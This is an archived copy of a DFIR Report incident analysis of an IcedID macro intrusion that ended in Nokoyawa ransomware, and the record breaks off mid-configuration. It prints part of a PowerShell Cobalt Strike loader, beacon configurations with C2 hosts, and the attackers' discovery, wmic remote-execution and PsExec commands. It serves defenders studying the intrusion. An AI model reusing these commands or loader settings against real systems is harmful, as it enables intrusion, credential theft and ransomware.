{
	"id": "08136038-02ad-4044-a97d-5d4a04e332c1",
	"created_at": "2026-04-06T00:07:12.80953Z",
	"updated_at": "2026-04-10T13:13:03.15474Z",
	"deleted_at": null,
	"sha1_hash": "3daa55dde07770e30de74e806c4c0411f30aecbc",
	"title": "IcedID Macro Ends in Nokoyawa Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10048823,
	"plain_text": "IcedID Macro Ends in Nokoyawa Ransomware\r\nBy editor\r\nPublished: 2023-05-22 · Archived: 2026-04-05 22:05:36 UTC\r\nThreat actors have moved to other means of initial access, such as ISO files combined with LNKs or OneNote payloads, but\r\nsome appearances of VBA macros in Office documents can still be seen in use.\r\nIn this case we document an incident taking place during Q4 of 2022 consisting of threat actors targeting Italian\r\norganizations with Excel maldocs that deploy IcedID. The threat actors deploying such a campaign may hope to target\r\norganizations who have not updated their Microsoft Office deployments after the newly released patches to block macros on\r\ndocuments downloaded from the internet.\r\nWe have previously reported on IcedID intrusions that have migrated to ISO files, however, this report is one of the most\r\nrecent that will focus on the traditional Excel/macro intrusion vector.\r\nOnce inside, the threat actors pivoted using Cobalt Strike and RDP before a domain wide deployment of Nokoyawa\r\nransomware with the help of PsExec. Nokowaya ransomware is a family with ties to Karma/Nemty.\r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private reports annually, such as this one but more concise and quickly published\r\npost-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking,\r\ndata clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nThis intrusion began with a malicious Excel document. We assess with medium-high confidence that this document was\r\ndelivered as part of a malicious email campaign during the first half of October 2022, based on public reporting that\r\noverlaps with multiple characteristics observed. Upon opening the Excel document, the macros would be executed when a\r\nuser clicked on an embedded image. The macro code was responsible for downloading and writing an IcedID DLL payload\r\nto disk. The macro then used a renamed rundll32 binary to execute the malicious DLL.\r\nAfter reaching out to the initial command and control server, automated discovery ran from the IcedID process around two\r\nminutes after execution. This discovery used the same suite of Microsoft binaries as we have previously reported for the\r\nIcedID malware family. At this time, the malware also established persistence on the beachhead host using a scheduled task.\r\nAround two hours after the initial malware ran, IcedID loaded several Cobalt Strike beacons on the beachhead. Within\r\nminutes of running Cobalt Strike on the beachhead the threat actors proceeded to elevate to SYSTEM permissions and dump\r\nLSASS memory using the beacons. Following this activity, the threat actors conducted further reconnaissance, and then\r\nmoved laterally to a Domain Controller through the execution of a Cobalt Strike payload via WMI.\r\nNext, discovery tasks continued from the beachhead host, including network scans for port 1433 (MSSQL) and browsing\r\nnetwork shares with an interest in password files. The threat actors appeared to have removed some contents of the network\r\nshares off the network as canary files report the documents being opened off network minutes later. After this, the threat\r\nactors remained quiet over the next several days.\r\nOn the fourth day, the threat actors returned briefly to execute a few commands on the Domain Controller related to the\r\nenumeration of domain computers and high privilege user account groups. Privilege escalation was also observed on the\r\nsystem via named pipe impersonation.\r\nEarly on the sixth day, the threat actors became active again launching the Edge browser on the beachhead host and\r\nappeared to download a file from dropmefiles[.]com. But after completing this, they went silent again for around another\r\neight hours. Then, from the beachhead host, a new process was spawned from the IcedID malware; and from this shell, the\r\nthreat actors began enumerating Active Directory using adget and AdFind.\r\nThe threat actors then began to spread laterally using a combination of Cobalt Strike beacon DLLs, batch scripts, and WMI\r\ncommands. More credential dumping was observed, followed by additional AdFind and other Windows discovery\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 1 of 33\n\ncommands. The threat actors then continued lateral movement and began checking RDP access across the environment. A\r\nbatch file was run enumerating hostnames throughout the environment using nslookup. Some further pivoting around\r\nsystems and targeted discovery continued throughout the rest of the day.\r\nOn the seventh day, around 23 hours since the last activity in the environment the threat actors began the final phase of the\r\nintrusion. The threat actors connected to a compromised server via RDP. From this server they would stage the ransomware\r\ndeployment. They deployed the ransomware payload, Sysinternals PsExec, and a cluster of batch files 1.bat-6.bat and p.bat.\r\nOpening a command prompt, they moved through executing the batch files copying p.bat, a renamed PsExec, and the\r\nransomware payload to all domain joined hosts. They then used the batch scripts to execute the ransomware payload via\r\nPsExec and WMI.\r\nThe time to ransomware (TTR) was around 148 hours (~6 days) from the initial infection. After the intrusion, contact was\r\nmade with the threat actors using their support site and the price of the ransom was quoted around $200,000 USD in Bitcoin.\r\nNo ransom was paid as a result of this intrusion.\r\nAnalysts\r\nAnalysis and reporting completed by @iiamaleks, @MittenSec, \u0026 @0xtornado.\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThis intrusion is linked to an IcedID malspam campaign that was observed in October 2022 targeting Italian organizations\r\nbased on overlap in the maldoc template and the IcedID C2 server.\r\nThis case involved an IcedID payload delivered through an Excel maldoc containing VBA macros that were linked to the\r\ntwo images embedded in the document, which caused the macros to execute when a user clicks on either of the images:\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 2 of 33\n\nThe macro associated with the maldoc reached out to a hard-coded domain and downloaded the first stage IcedID payload.\r\nMore on this in the next section.\r\nExecution\r\nIcedID\r\nOnce the VBA macro was invoked, Excel connected to the hard-coded domain and downloaded the first stage of the IcedID\r\npayload.\r\nWhen the VBA macro from Excel calls out to the hard-coded domain, it has multiple interesting characteristics, including:\r\nTwo OPTIONS requests followed by a GET request.\r\nUser-agent fields mentioning Microsoft Office.\r\nSpecific HTTP headers such as X-Office-Major-Version , X-MSGETWEBURL , X-IDCRL_ACCEPTED , and UA-CPU .\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 3 of 33\n\nOnce the IcedID payload is successfully retrieved, it will be decoded with Base64 and written to disk. In this case, the\r\npayload was written to the path retrieved from Application.DefaultFilePath , which is the default path used by Excel\r\nwhen it opens files.\r\nThe random name generated for the IcedID payload may be either 1 to 7 random digits, or 4500 . This is because the Rnd\r\nfunction will return “a value less than 1 but greater than or equal to zero“.\r\nOnce the IcedID payload is successfully written to disk, the following post deployment steps are initiated:\r\nRundll32.exe is copied into a file named calc.exe under the path returned by Application.DefaultFilePath .\r\nCalc.exe (renamed rundll32.exe) is used to invoke the IcedID payload.\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 4 of 33\n\nIn this case, rundll32.exe was copied into the user Documents folder and named calc.exe. The name ‘calc.exe’ is hard-coded\r\ninto the VBA code and will not be changed.\r\nOnce the VBA macros invoked the IcedID payload, the parent-child process relationship between Excel and calc.exe was\r\nobserved.\r\nThe following diagram provides a visual summary of the process to execute IcedID on the endpoint.\r\nIcedID VNC\r\nThe threat actors were observed making use of an VNC module that was spawned by IcedID to spawn the Microsoft Edge\r\nbrowser:\r\nWe were able to reconstruct some of the VNC traffic thanks to @0xThiebaut‘s tool PCAPeek. You can see the below options\r\nsuch as Edge, Chrome, Firefox, CMD, Task Manager and run dialog. Based on the visual it appears to be the KeyHole VNC\r\nmodule reported first observed in Oct 2022 by NVISO.\r\nIn another instance, a run dialog was observed being used to execute the calc.exe file that was created earlier. More\r\ninformation can be found about this here.\r\nHowever, the command below would have no effect in this case as calc.exe is a renamed version of rundll32 and no\r\nparameters were passed.\r\nSeveral other programs were seen run in this manner, as seen in process execution logs below:\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 5 of 33\n\nCobalt Strike\r\nThe threat actors used Cobalt Strike beacons throughout the intrusion. The first beacon was executed via PowerShell, which\r\nin turn was executed initially by a command shell which was started by the IcedID malware at the same time a DLL beacon\r\nwas also executed.\r\nThe downloaded PowerShell payload, previously hosted on hxxps://aicsoftware[.]com:757/coin, is available on VirusTotal.\r\nHere is the content of the payload, where we can observe an object being created in memory using an encoded string. We\r\nwill walk through decoding this string to view the Cobalt Strike configuration present within.\r\n$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"H4sIAAAAAAAA/9y969OySLIv+nnmr+gPK6K7g16tIqLuiBVxEB\r\n\u003c---CROPPED_BASE64_CODE---\u003e\r\n/Pj8+Pz4/Pj8+Pz4/Pj8+Pz4/Pj83/580/ff/rpD9tj9u3nP96//cu32j9/o//+aX/59sfrKvstOG7CX62jOFzw75r2/du//fSHP1RFf/nj/a9\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 6 of 33\n\nAfter initial Base64 decoding, we found the payload used the default Cobalt Strike XOR value of 35 which allows for the\r\nnext step of decoding the payload.\r\nSecond stage decoding:\r\nAfter this an MZ header can be observed. From there, the data can be saved and reviewed using 1768.py from Didier\r\nStevens, revealing the Cobalt Strike configuration embedded within:\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 7 of 33\n\nThe full configuration:\r\nConfig found: xorkey b'.' 0x00000000 0x0000573e\r\n0x0001 payload type 0x0001 0x0002 8 windows-beacon_https-reverse_https\r\n0x0002 port 0x0001 0x0002 757\r\n0x0003 sleeptime 0x0002 0x0004 62518\r\n0x0004 maxgetsize 0x0002 0x0004 1864736\r\n0x0005 jitter 0x0001 0x0002 37\r\n0x0007 publickey 0x0003 0x0100 30819f302e06092a864886f72e010101050003818d00308189028181\r\n0x0008 server,get-uri 0x0003 0x0100 'aicsoftware\\rcom,/templates'\r\n0x000e SpawnTo 0x0003 0x0010 (NULL ...)\r\n0x001d spawnto_x86 0x0003 0x0040 '%windir%\\\\syswow64\\\\regsvr32\\rexe'\r\n0x001e spawnto_x64 0x0003 0x0040 '%windir%\\\\sysnative\\\\regsvr32\\rexe'\r\n0x001f CryptoScheme 0x0001 0x0002 0\r\n0x001a get-verb 0x0003 0x0010 'GET'\r\n0x001b post-verb 0x0003 0x0010 'POST'\r\n0x001c HttpPostChunk 0x0002 0x0004 0\r\n0x0025 license-id 0x0002 0x0004 305419776\r\n0x0026 bStageCleanup 0x0001 0x0002 1\r\n0x0027 bCFGCaution 0x0001 0x0002 0\r\n0x0009 useragent 0x0003 0x0100 'Mozilla/5\\r0 (Macintosh; Intel Mac OS X 10_11_2) AppleW\r\n0x000a post-uri 0x0003 0x0040 '/favicon'\r\n0x000b Malleable_C2_Instructions 0x0003 0x0100\r\n Transform Input: [7:Input,4,2:600,3,46]\r\n Print\r\n Remove 600 bytes from begin\r\n BASE64\r\n Unknown instruction: 0x2e\r\n0x000c http_get_header 0x0003 0x0200\r\ncomonst_host_header Host: aicsoftware\r\n Const_header Connection: close\r\n Build Metadata: [7:Metadata,46,3,2:wordpress_logged_in=,6:Cookie,9:mark=true]\r\n Unknown instruction: 0x2e\r\n BASE64\r\n Prepend wordpress_logged_in=\r\n Header Cookie\r\n Const_parameter mark=true\r\n0x002e process-inject-transform-x86 0x0003 0x0200 '\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x15Host: aicsoftware\\rcom\\\r\n0x0036 HostHeader 0x0003 0x0080 (NULL ...)\r\n0x0032 UsesCookies 0x0001 0x0002 1\r\n0x0023 proxy_type 0x0001 0x0002 2 IE settings\r\n0x003a TCP_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0039 SMB_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0037 EXIT_FUNK 0x0001 0x0002 0\r\n0x0028 killdate 0x0002 0x0004 0\r\n0x0029 textSectionEnd 0x0002 0x0004 177872\r\n0x002a feSectionsInfo 0x0003 0x0028 '\\x00À\\x02\\x00r¸\\x03\\x00\\x00À\\x03\\x00\\x88\\x85\\x04\\x00\\x00\\x90\\x\r\n0x002b process-inject-start-rwx 0x0001 0x0002 4 PAGE_READWRITE\r\n0x002c process-inject-use-rwx 0x0001 0x0002 32 PAGE_EXECUTE_READ\r\n0x002d process-inject-min_alloc 0x0002 0x0004 6133\r\n0x000d http_post_header 0x0003 0x0100\r\n Header \r\n0x002f process-inject-transform-x64 0x0003 0x0100 '\\x00\\x00\\x00\\x06\\x90\\x90\\x90\\x90\\x90\\x90'\r\n0x0035 process-inject-stub 0x0003 0x0010 'µJþ\\x01ìjuíó^\\x1aDø½9)'\r\n0x0033 process-inject-execute 0x0003 0x0080 '\\x01\\x04\\x03'\r\n0x0034 process-inject-allocation-method 0x0001 0x0002 0\r\n0x0000\r\nGuessing Cobalt Strike version: 4.2 (max 0x003a)\r\nSanity check Cobalt Strike config: OK\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 8 of 33\n\nAfter using PowerShell beacons during the first day on the beachhead host and a Domain Controller, the threat actors moved\r\nto using DLL files exclusively for the remainder of Cobalt Strike beacons deployed during the intrusion. Other notable\r\nexecutions included the use of batch files:\r\nC:\\Windows\\system32\\cmd.exe /c c:\\windows\\temp\\1.bat\r\n-\u003e rundll32.exe c:\\windows\\temp\\1.dll, DllRegisterServer\r\nPersistence\r\nDuring the initial execution of IcedID, the following two files were created under the AppData Roaming folder of the user\r\nthat executed it:\r\nexdudipo.dll: IcedID first stage.\r\nlicense.dat: Encoded version of the second stage which the first stage will load into memory.\r\nA scheduled task was created that contained instructions on executing the IcedID DLL and the location of the license.dat\r\nfile. This is a very common method that IcedID has used for persistence.\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cURI\u003e\\{3774AD25-8218-8099-89BA-CE96C6E9DC4E}\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n \u003cTimeTrigger id=\"TimeTrigger\"\u003e\r\n \u003cRepetition\u003e\r\n \u003cInterval\u003ePT1H\u003c/Interval\u003e\r\n \u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n \u003c/Repetition\u003e\r\n \u003cStartBoundary\u003e2012-01-01T12:00:00\u003c/StartBoundary\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003c/TimeTrigger\u003e\r\n \u003cLogonTrigger id=\"LogonTrigger\"\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cUserId\u003e[REDACTED USER]\u003c/UserId\u003e\r\n \u003c/LogonTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n \u003cRunLevel\u003eHighestAvailable\u003c/RunLevel\u003e\r\n \u003cUserId\u003e[REDACTED DOMAIN]\\[REDACTED USER]\u003c/UserId\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003efalse\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cDuration\u003ePT10M\u003c/Duration\u003e\r\n \u003cWaitTimeout\u003ePT1H\u003c/WaitTimeout\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 9 of 33\n\n\u003cExec\u003e\r\n \u003cCommand\u003erundll32.exe\u003c/Command\u003e\r\n \u003cArguments\u003e\"C:\\Users\\[REDACTED USER]\\AppData\\Roaming\\{02959BFD-29E0-6A95-3B77-5E55B8D01CB7}\\{CA2AB541-E1\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nThe scheduled task was configured to execute every hour.\r\nPrivilege Escalation\r\nPrivilege escalation was completed on two systems via the named pipe GetSystem feature within the Cobalt Strike tool. An\r\nexample is shown below via Sysmon event ID 1 – ProcessCreate Rule:\r\nDefense Evasion\r\nThis intrusion displayed numerous techniques used by threat actors to evade detection.\r\nProcess Injection\r\nThe adversary was seen injecting code into legitimate processes via CreateRemoteThread which can be detected using\r\nSysmon event ID 8.\r\nThe table below shows examples of injected processes found via an in memory yara scan using this Malpedia yara rule:\r\nHost\r\nProcess\r\nID\r\nProcessName CommandLine\r\nworkstation.domain.local 612 winlogon.exe winlogon.exe\r\nworkstation.domain.local 828 svchost.exe C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 10 of 33\n\nfileshare.domain.local 760 svchost.exe C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p\r\nfileshare.domain.local 4928 winlogon.exe winlogon.exe\r\nfileshare.domain.local 1960 rundll32.exe rundll32.exe c:\\windows\\temp\\1.dll\r\nbeachhead.domain.local 712 lsass.exe C:\\Windows\\system32\\lsass.exe\r\nbeachhead.domain.local 812 svchost.exe C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbS\r\nbeachhead.domain.local 5884 TextInputHost.exe\r\nC:\\Windows\\SystemApps\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\TextIn\r\n-ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca\r\nbeachhead.domain.local 2036 sysmon64.exe C:\\Windows\\sysmon64.exe -z syscliprpc9E7B7D3FAF371803\r\nbeachhead.domain.local 2568 regsvr32.exe C:\\Windows\\syswow64\\regsvr32.exe\r\nbeachhead.domain.local 9760 cmd.exe C:\\Windows\\SysWOW64\\cmd.exe\r\nserver.domain.local 432 rundll32.exe rundll32.exe 1.dll\r\nFile Deletion\r\nFiles that were dropped in temporary directories were deleted after execution as seen below with Sysmon event ID 11 and\r\n23.\r\nBelow is the list of files seen being created and later deleted by the threat actor:\r\n7.exe\r\nadfind.bat\r\nadfind.exe\r\nadget.exe\r\nad.7z\r\n1.bat\r\n1.dll\r\n7.exe\r\nns.bat\r\nRenamed System Utilities\r\nAdversaries typically rename common Windows system utilities to avoid triggering alerts that monitor utility usage. The\r\ntable below summaries the renamed utilities observed in this intrusion.\r\nWindows Utility Renamed Windows Utility\r\nrundll32.exe C:\\Users\\\u003cREDACTED\u003e\\Documents\\calc.exe\r\npsexesvc.exe C:\\Windows\\mstdc.exe\r\nCredential Access\r\nThe threat actors were observed accessing a file server, and browsing though files related to passwords. These would later be\r\nobserved opened off network, more details in the exfiltration section on that activity.\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 11 of 33\n\nOn the second day of the intrusion, after moving laterally to a Domain Controller, LSASS was accessed from a Cobalt Strike\r\nprocess. The access granted value 0x1010 was observed. As noted in a previous report, this value matches known mimikatz\r\naccess patterns. This logged event suggests Cobalt Strike accessed LSASS to dump credentials from memory. This activity\r\nwas observed again on various hosts on the fourth and sixth days of the intrusion.\r\nDiscovery\r\nThe discovery phase primarily utilized built-in Windows tools. One utility seen was chcp which allows you to display or\r\nset the code page number. The default chcp value is determined by the Windows locale. The locale can indicate the\r\nlanguage, country, and regional standards of that host (e.g. date and time formatting). After viewing the default page code,\r\nthe adversary did change the value to 65001 to reflect the UTF-8 character set. We have seen this as a technique employed\r\nby IcedID for some time as reported in depth in prior cases.\r\narp -a\r\nchcp \u003e\u00262\r\nchcp 65001\r\nchcp 65001 \u0026\u0026 c: \u0026\u0026 cd c:\\\r\ndir \\\\\u003cREDACTED\u003e\\c$\r\nipconfig /all\r\nnet config workstation\r\nnet group \"Domain Admins\" /domain\r\nnet group \"Domain Computers\" /domain\r\nnet group \"domain admins\" /dom\r\nnet group \"enterprise admins\" /dom\r\nnet localgroup \"administrators\" /dom\r\nnet view /all\r\nnet view /all /domain\r\nnet1 config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nping \u003cHOST_IP\u003e\r\nsysteminfo\r\nwhoami\r\nwhoami /upn\r\nFollowing the initial discovery commands mentioned above on day one, the threat actor scanned the network for port 1433,\r\nthe default port used by Microsoft SQL server.\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 12 of 33\n\nThe discovery phase remained minimal leading into day six. The threat actors were seen dropping AdFind and adget.exe to\r\nreveal all users, groups, computers, organizational units, subnets, and trust objects within the domain.\r\nadfind.exe -gcb -sc trustdmp\r\nadfind.exe -f (objectcategory=group)\r\nadfind.exe -subnets -f (objectCategory=subnet)\r\nadfind.exe -f (objectcategory=organizationalUnit)\r\nadfind.exe -f objectcategory=computer\r\nadfind.exe -f (objectcategory=person)\r\nAdget is a newer tool that we first observed in this previous report but generally this tool performs similar AD discovery as\r\nAdFind.\r\nFollowing the Active Directory discovery activity, additional remote discovery actions were observed using WMI to gather\r\ninformation about Windows OS version and licensing on the hosts.\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 13 of 33\n\nC:\\Windows\\system32\\cmd.exe /C wmic /node:\"REDACTED\" /user:\"USER\" /password:\"REDACTED\" os get caption\r\nThen another recon round occurred using NSLOOKUP to map assets to IP addresses.\r\nThis was followed by network scans for RDP:\r\nLateral Movement\r\nDuring this intrusion, threat actors used a number of different techniques to move laterally across the domain. The\r\ntechniques used will be detailed in the following sections.\r\nT1021.006 Remote Services: WinRM\r\nSome of the threat actors’ lateral activity was executed using WinRM, this could be observed by matching parent-child\r\nprocess trees and DCE RPC traffic.\r\nT1047 WMI\r\nThreat Actors ran the following command to download and execute an in memory PowerShell payload on a domain\r\ncontroller:\r\nC:\\\\Windows\\\\System32\\\\wbem\\\\wmic.exe /node:REDACTED process call create \\\"\"cmd.exe /c powershell.exe -nop -w\r\nWMI was also used also when executing remote DLL beacons:\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 14 of 33\n\nC:\\Windows\\system32\\cmd.exe /C wmic /node:\"REDACTED\" process call create \"c:\\windows\\system32\\rundll32.exe c:\\\r\nWMI commands were also observed during ransom deployment:\r\nwmic /node:REDACTED /user:DOMAIN\\USER /password:REDACTED process call create cmd.exe /c copy \\\\REDACTED\\c$\\win\r\nT1021.002 Remote Services: SMB/Windows Admin Shares\r\nThe threat actors relied on SMB to move their tools throughout the network during the intrusion.\r\nThe threat actors used PSExec to move laterally to servers during the ransom execution, the -r flag was used to rename the\r\nbinary created on the remote server to mstdc.exe .\r\nBelow are some of the PsExec forensic artifacts logged in Windows Event Logs and Sysmon:\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 15 of 33\n\nOverview of the mstdc.exe binary (renamed psexecsvc.exe):\r\nRenaming PsExec is likely an action taken by threat actors to bypass basic PsExec anomaly rules. However, there are Sigma\r\nrules which detect this specific technique, as shared by Florian Roth back in 2019.\r\nThey also employed use of the Windows copy utility to move files around the network via SMB:\r\ncmd.exe /c copy \\\\REDACTED\\c$\\windows\\temp\\p.bat c:\\windows\\temp\\\r\nT1021.001 Remote Services: RDP\r\nThreat actors also used RDP during this intrusion. Below is an example of forensic artifacts left after using RDP to move\r\nlaterally from the beachhead to one of the domain servers logged in Windows Event Logs using different providers:\r\nCollection\r\nDuring discovery actions, the threat actors were observed using 7-Zip to archive data collected from active directory using\r\nAdFind.\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 16 of 33\n\n7.exe a -mx3 ad.7z ad_*\r\nCommand and Control\r\nIcedID\r\nIn this case IcedID was observed with the campaign ID of 3298576311 communicating with a C2 server located at\r\nkicknocisd[.]com.\r\nSuricata Rule Name Domain IP AS ORG Country\r\nET MALWARE\r\nWin32/IcedID Request\r\nCookie\r\nkicknocisd[.]com 159.65.169[.]200\r\nDIGITALOCEAN-ASNUnited\r\nStates\r\nAfter initial connections, IcedID command and control traffic moved to the following servers.\r\nDomain IP Port JA3 JA3s\r\ncurabiebarristie[.]com 198.244.180.66 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc\r\nstayersa[.]art 198.244.180.66 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc\r\nguaracheza[.]pics 45.66.248.119 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc\r\nbelliecow[.]wiki 45.66.248.119 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc\r\nConnections to one of the IcedID servers was observed in memory dumps from the beachhead host. This evidence is\r\nconsistent with the connections to 45.66.248[.]119 observed from the renamed rundll32.exe that loaded the IcedID DLL\r\nduring maldoc execution at the beginning of this case.\r\nBackConnect VNC\r\nDuring the intrusion we also observed connections to a BackConnect VNC IP address. These connections were also\r\nspawned from the running IcedID process on the beachhead host.\r\nAlerts from Lenny Hansson‘s ruleset fired on the traffic for the following alerts:\r\nSuricata Alert IP Port\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 17 of 33\n\nNF – Malware IcedID BackConnect – Wait Command 137.74.104.108 8080\r\nNF – Malware IcedID BackConnect – Start VNC command – 11 137.74.104.108 8080\r\nHere’s another look at the VNC GUI from the attackers standpoint.\r\nIn the execution section we covered utilities launched by the threat actors from the VNC activity.\r\nWeb Service\r\nOn the sixth day, the threat actors launched an Edge browser on the beachhead host, via VNC as described in the execution\r\nsection, and connected to the site dropmefiles[.]com a site that offers free file transfer services. Data connections from the\r\nEdge browser in the SRUMDB indicate that a file download occurred but we were unable to determine what the file was or\r\nits purpose related to the intrusion.\r\nCobalt Strike\r\nT1071 / S0154\r\nThe threat actors dropped and executed a malicious DLL, p1.dll, on the beachhead. This malicious DLL is a Cobalt Strike\r\nbeacon reaching out to 23.29.115.152/aicsoftware[.]com on ports 757 and 8080. Later the threat actors also injected further\r\nbeacons into memory reaching out to 50.3.132.232 /iconnectgs[.]com on port 8081. Later on day six, the threat actors added\r\na new Cobalt Strike server to the intrusion, 5.8.18.242 on port 443 (see below for visualizing this activity).\r\nBeaconing\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 18 of 33\n\nBelow is a screenshot of a packet captured from C2 traffic over HTTP. Encrypted POST requests made to iconnectgs[.]com\r\n(50.3.132[.]232) are seen:\r\nCobalt Strike Configurations\r\nDomain IP Port JA3 JA3s\r\naicsoftware[.]com 23.29.115.152 757 a0e9f5d64349fb13191bc781f81f42e1 f176ba63b4d68e576b5ba345bec2c7b7\r\naicsoftware[.]com 23.29.115.152 8080 N/A N/A\r\n{\r\n \"beacontype\": [\r\n \"HTTP\"\r\n ],\r\n \"sleeptime\": 62518,\r\n \"jitter\": 37,\r\n \"maxgetsize\": 1398708,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 305419776,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"aicsoftware.com\",\r\n \"port\": 8080,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCTgLGIvbpnfCb/itwv1b3pfVlfzKp7OJvlLCx21brRU3EF8QXj\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/br.js\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"prepend 600 characters\",\r\n \"base64\",\r\n \"mask\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/es\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 19 of 33\n\n\"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": 